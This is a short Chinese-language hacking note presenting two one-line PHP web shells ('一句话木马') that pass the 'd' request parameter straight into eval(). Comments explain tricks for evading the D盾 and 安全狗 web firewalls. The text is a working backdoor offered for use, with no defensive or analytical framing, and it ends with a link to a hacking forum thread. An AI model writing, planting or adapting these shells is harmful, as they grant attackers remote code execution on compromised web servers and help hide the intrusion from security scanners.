一句话木马：PHP篇

 

 珍藏版：

 

一个简单的过D盾的免杀php

<?php
$ab = $_REQUEST['d'];
$a['t'] = "";//主要带对象 D盾就不管后面的了。。。
eval($a['t'].$ab);

过狗过D盾

<?php
$a = $_REQUEST['d'];//参数
$a = "$a";//狗不会二次检测
$b['test'] = "";//主要怕太特殊情况状态码:500
eval($b['test']."$a");//跟之前一样。。

 

 参考链接：https://www.t00ls.net/thread-49715-1-1.html